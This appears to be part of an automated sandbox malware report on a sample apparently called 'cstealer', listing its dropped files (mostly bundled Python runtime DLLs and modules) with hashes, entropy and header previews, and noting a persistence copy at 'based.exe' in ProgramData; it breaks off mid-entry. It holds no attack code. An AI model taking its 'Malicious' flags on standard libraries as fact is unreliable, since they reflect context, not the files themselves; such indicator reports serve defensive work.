                                                                                                                                                          SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
                                                                                                                                                          SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............l+....................................................`.............................................d............`.......P.......F...)...p..4... ...T...............................@...............x............................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..4....p.......8..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\certifi\cacert.pem

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):4.673454313041419
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
                                                                                                                                                          MD5:723EC2E1404AE1047C3EF860B9840C29
                                                                                                                                                          SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
                                                                                                                                                          SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
                                                                                                                                                          SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d...siAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):119296
                                                                                                                                                          Entropy (8bit):5.872097486056729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
                                                                                                                                                          MD5:9EA8098D31ADB0F9D928759BDCA39819
                                                                                                                                                          SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
                                                                                                                                                          SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
                                                                                                                                                          SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d...siAe.........." ...%.*..........0........................................ ............`.........................................p...d..........................................Px...............................w..@............@...............................text...X).......*.................. ..`.rdata...X...@...Z..................@..@.data...8=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3441504
                                                                                                                                                          Entropy (8bit):6.097985120800337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
                                                                                                                                                          MD5:6F4B8EB45A965372156086201207C81F
                                                                                                                                                          SHA1:8278F9539463F0A45009287F0516098CB7A15406
                                                                                                                                                          SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
                                                                                                                                                          SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\libffi-8.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35064
                                                                                                                                                          Entropy (8bit):6.362215445656998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
                                                                                                                                                          MD5:32D36D2B0719DB2B739AF803C5E1C2F5
                                                                                                                                                          SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
                                                                                                                                                          SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
                                                                                                                                                          SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....H...*.......L..............................................4.....`..........................................l.......o..P...............8....l..........(....b...............................c..8............`.. ............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................b..............@....pdata..8............d..............@..@.reloc..(............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\libssl-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):702816
                                                                                                                                                          Entropy (8bit):5.547832370836076
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
                                                                                                                                                          MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
                                                                                                                                                          SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
                                                                                                                                                          SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
                                                                                                                                                          SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\python311.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5758328
                                                                                                                                                          Entropy (8bit):6.089726305084683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
                                                                                                                                                          MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
                                                                                                                                                          SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
                                                                                                                                                          SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
                                                                                                                                                          SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!.T%..,7......K........................................\......~X...`.........................................P.@......NA......`[.......V../....W.x)...p[..B....).T...........................P.).@............p%..............................text...BS%......T%................. ..`.rdata..0....p%......X%.............@..@.data.........A..N...\A.............@....pdata.../....V..0....Q.............@..@PyRuntim......X.......S.............@....rsrc........`[......fV.............@..@.reloc...B...p[..D...pV.............@..B........................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29056
                                                                                                                                                          Entropy (8bit):6.49468173344972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
                                                                                                                                                          MD5:97EE623F1217A7B4B7DE5769B7B665D6
                                                                                                                                                          SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
                                                                                                                                                          SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
                                                                                                                                                          SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\sqlite3.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1481088
                                                                                                                                                          Entropy (8bit):6.569811736013214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
                                                                                                                                                          MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                          SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                          SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                          SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI11282\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48000
                                                                                                                                                          Entropy (8bit):7.804339649997861
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:ZwAGUM8GBetg87It88blNUL6yfsFtHrrhhto+MQw5aZ/hLYpUHIDtVzR3YiSyvLk:OAG/k9MjCDErhhmQXfTHIDtVzV7SyD85
                                                                                                                                                          MD5:0C13627F114F346604B0E8CBC03BAF29
                                                                                                                                                          SHA1:BF77611D924DF2C80AABCC3F70520D78408587A2
                                                                                                                                                          SHA-256:DF1E666B55AAE6EDE59EF672D173BD0D64EF3E824A64918E081082B8626A5861
                                                                                                                                                          SHA-512:C97FA0F0988581EAE5194BD6111C1D9C0E5B1411BAB47DF5AA7C39AAD69BFBECA383514D6AAA45439BB46EACF6552D7B7ED08876B5E6864C8507EAA0A72D4334
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!............Pd....................................................`.............................................H.................... .. ..................................................Pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_ctypes.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):58744
                                                                                                                                                          Entropy (8bit):7.8341561308362255
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:kPWq49sE7fzlG5lNXdrYMP0MkeBvGhd0LYXIDQPTl7Syw0Pxv:kPWqKT1GLZdrDkHhOEXIDQPTl6Exv
                                                                                                                                                          MD5:38FB83BD4FEBED211BD25E19E1CAE555
                                                                                                                                                          SHA1:4541DF6B69D0D52687EDB12A878AE2CD44F82DB6
                                                                                                                                                          SHA-256:CD31AF70CBCFE81B01A75EBEB2DE86079F4CBE767B75C3B5799EF8B9F0392D65
                                                                                                                                                          SHA-512:F703B231B675C45ACCB1F05CD34319B5B3B7583D85BF2D54194F9E7C704FBCD82EF2A2CD286E6A50234F02C43616FBECCFD635AEFD73424C1834F5DCA52C0931
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.........p...........................................@............`.........................................H<.......9.......0.......................<.......................................(..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):107384
                                                                                                                                                          Entropy (8bit):7.936833941258681
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:YzsRxWJXVyOgbHffu+MLtWH/WSWXb01KQiID5q1CAt6xN:PU/gbHfW6WSWLplCuG
                                                                                                                                                          MD5:7BA541DEFE3739A888BE466C999C9787
                                                                                                                                                          SHA1:AD0A4DF9523EEEAFC1E67B0E4E3D7A6CF9C4DFAC
                                                                                                                                                          SHA-256:F90EFA10D90D940CDE48AAFE02C13A0FC0A1F0BE7F3714856B7A1435F5DECF29
                                                                                                                                                          SHA-512:9194A527A17A505D049161935432FA25BA154E1AEE6306DEE9054071F249C891F0CA7839DE3A21D09B57FDC3F29EE7C4F08237B0DFFFAFA8F0078CFE464BED3B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.p.......... ........................................0............`..........................................,..P....)....... ..........H'...........-...................................... ...@...........................................UPX0....................................UPX1.....p.......h..................@....rsrc........ .......l..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):34688
                                                                                                                                                          Entropy (8bit):7.676872991541861
                                                                                                                                                          Encrypted:false
